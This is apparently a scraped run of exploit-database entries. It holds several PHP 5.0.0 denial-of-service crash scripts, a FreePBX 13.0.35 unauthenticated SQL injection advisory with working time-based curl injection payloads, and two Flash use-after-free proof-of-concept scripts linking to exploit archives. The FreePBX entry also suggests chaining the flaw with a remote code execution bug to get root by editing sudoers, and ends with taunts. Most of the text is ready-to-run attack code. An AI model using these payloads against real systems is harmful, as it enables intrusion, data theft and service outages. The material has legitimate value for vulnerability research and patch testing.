## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");

$str = str_repeat('A', 9999);
//fbird_connect($str);
fbird_pconnect($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalkoid('127.0.0.1', 'public', $str); 
?>
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 html_doc_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
html_doc_file($str);
?>
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

hw_docbyanchor(0,0);
?>
HireHackking 
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com

Freepbx suffer from unauthenticated sql injection flaw due to insufficient sanitization of "display" parameter
 
File : admin/libraries/DB.class.php
    public function getAll($sql,$params=array(),$fetchmode=DB_FETCHMODE_DEFAULT) {
        //this is a sad workaround for people who couldn't follow documentation for functions
        $fetchmode = $this->isFetchMode($params) ? $params : $fetchmode;
        self::$error = null;
        try {
            $fetch = $this->correctFetchMode($fetchmode);
            if(!empty($params) && is_array($params)) {
                $this->res = $this->db->prepare($sql);
    ------->>>>> $this->res->execute($params);
                return $this->res->fetchAll($fetch);
            }
            $this->res = $this->db->query($sql);
            if($this->res === false) {
                return false;
            }
            return $this->res->fetchAll($fetch);
        } catch (Exception $e) {
            return new DB_Error($e);
        }
    }

File : admin/libraries/modulefunctions.class.php
Line 593
        function getinfo($module = false, $status = false, $forceload = false) {

        global $amp_conf, $db;
        $modules = array();

        if ($module) {
            // get info on only one module
            $xml = $this->_readxml($module);
            if (!is_null($xml)) {
                $modules[$module] = $xml;
                // if status is anything else, it will be updated below when we read the db
                $modules[$module]['status'] = MODULE_STATUS_NOTINSTALLED;
            }

            // query to get just this one
    ---===>>>> $sql = 'SELECT * FROM modules WHERE modulename = "'.$module.'"';
        }
        if ($module || !$modulelist->is_loaded()) {
    ---===>>>$results = $db->getAll($sql,DB_FETCHMODE_ASSOC);
            if(DB::IsError($results)) {
                die_freepbx($sql."<br>\n".$results->getMessage());
            }
       
File : admin/libraries/modulefunctions.legacy.php
Line 52
        function module_getinfo($module = false, $status = false, $forceload = false) {
            _module_backtrace();
            $modulef = module_functions::create();
        ---===>>> return $modulef->getinfo($module, $status, $forceload);
        }

File : admin/views/noaccess.php
        <?php
        $display = isset($_REQUEST['display'])?$_REQUEST['display']:false;
    ---===>>> $modinfo = \module_getinfo($display);

'display' parameter is being passed to sql execute() func without perior sanitization which lead to obvious sql injection flaw without any pre-needed authentication

POC :

Normal request

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris'
Total request time : 0.001 + 0.309 =  0.334

Sql injected

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/'
Total request time : 0.158 + 4.391 =  4.417

# Mix this with the 13.0.35 RCE one , and you are ok to get root just by echoing asterisk to the sudoers ;)
# We're still ruling the game idiots , from Eg-R1z with dust xDD
# ./f4ris
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 imap_mail() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("imap")) die("You need imap extension loaded!");

$str = str_repeat('A', 9999);
imap_mail($str,'','');
?>
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844

There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap
	}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40311.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=843

There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});


function func(){

	mc.removeMovieClip();
	
	// Fix the heap	
	
	}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40310.zip